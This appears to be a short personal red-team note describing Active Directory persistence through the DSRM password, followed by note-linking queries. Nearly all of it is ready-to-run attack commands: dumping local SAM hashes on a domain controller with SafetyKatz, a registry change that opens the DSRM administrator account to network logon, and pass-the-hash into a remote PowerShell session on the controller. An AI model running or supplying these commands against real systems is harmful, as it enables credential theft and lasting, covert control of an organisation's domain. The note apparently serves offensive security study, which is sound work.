Persistence using DSRM Password

Technique Info

1. Dump DSRM Password (need DA privs)

   SafetyKatz.exe "token::elevate" "lsadump::sam"

2. add registry to allow network access

   reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "DsrmAdminLogonBehavior" /t REG_DWORD /d 2 /f

3. Use the hash to access the Domain controller as the local Administrator

   SafetyKatz.exe "sekurlsa::pth /domain:<local-dc-computer-name> /user:Administrator /ntlm:<dsrm-ntlm-hash> /run:powershell.exe"
    
   Set-Item WSMan:\localhost\Client\TrustedHosts <dc-ip>
    
   Enter-PSSession -ComputerName <dc-ip> -Authentication NegotiateWithImplicitCredential

Related

Related Notes

All Related Notes

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "windows") OR contains(tags, "active-directory") OR contains(tags, "persistence")
SORT file.ctime DESC

windows

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "windows")
SORT file.ctime DESC

active-directory

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "active-directory")
SORT file.ctime DESC

persistence

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "persistence")
SORT file.ctime DESC